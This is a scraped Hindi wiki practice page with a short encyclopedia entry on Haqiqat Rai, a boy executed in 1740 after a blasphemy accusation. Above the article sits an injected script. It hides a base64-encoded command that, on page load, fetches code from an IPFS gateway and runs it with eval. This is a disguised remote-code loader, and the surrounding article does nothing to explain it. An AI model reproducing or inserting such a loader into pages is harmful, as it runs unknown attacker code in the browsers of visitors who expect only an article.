सदस्य:हिमानी/अभ्यास2  

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

हकीकत राय (जन्म- 1724 ई. स्यालकोट (अब पाकिस्तान), मृत्यु- 1740) एक वीर साहसी बालक थे। उनके पिता का नाम भागमल था। हकीकत राय बचपन से ही बड़ी धार्मिक प्रवृत्ति के थे। वे एक मकतब में मौलवी साहब के पास पढ़ने के लिए जाया करते थे। एक दिन मौलवी साहब की अनुपस्थिति में उनके कुछ सहपाठियों ने हिन्दू देवी दुर्गा को गाली दी। हकीकत राय ने विरोध किया और कहा, ‘यदि मैं मुहम्मद साहब की पुत्री फ़ातिमा के विषय में ऐसी ही अपमान जनक भाषा का प्रयोग करूँ, तो तुम लोगों को कैसा लगेगा?’ सहपाठियों ने इसकी शिकायत मौलवी साहब से की। बाद में यह मामला स्यालकोट के शासक अमीर बेग की अदालत में पहुँचा। हकीकत राय ने दोनों जगह सही बात बता दी। मुल्लाओं की राय ली गई, तो उन्होंने कहा कि, हकीकत राय के मन में इस्लाम के अपमान का विचार आया, इसीलिए उसे मृत्युदण्ड दिया जाए। लाहौर के सूबेदार की कचहरी में भी यही निर्णय बहाल रहा। तब मुल्लाओं ने कहा कि, हकीकत राय इस्लाम धर्म ग्रहण कर ले, तो उसके प्राण बच सकते हैं। माता-पिता और वयस्क पत्नी ने इसे मान लेने का अनुरोध किया, पर हकीकत राय इसके तैयार नहीं हुए। 1740 ई. में उन्हें फाँसी पर चढ़ा दिया गया। लाहौर के दो मील पूर्व की दिशा में हकीकत राय की समाधि बनी हुई है। (हिन्दी विश्वकोश, खण्ड-12, पृष्ठ संख्या-85)

"https://amp.bharatdiscovery.org/w/index.php?title=सदस्य:हिमानी/अभ्यास2&oldid=208601" से लिया गया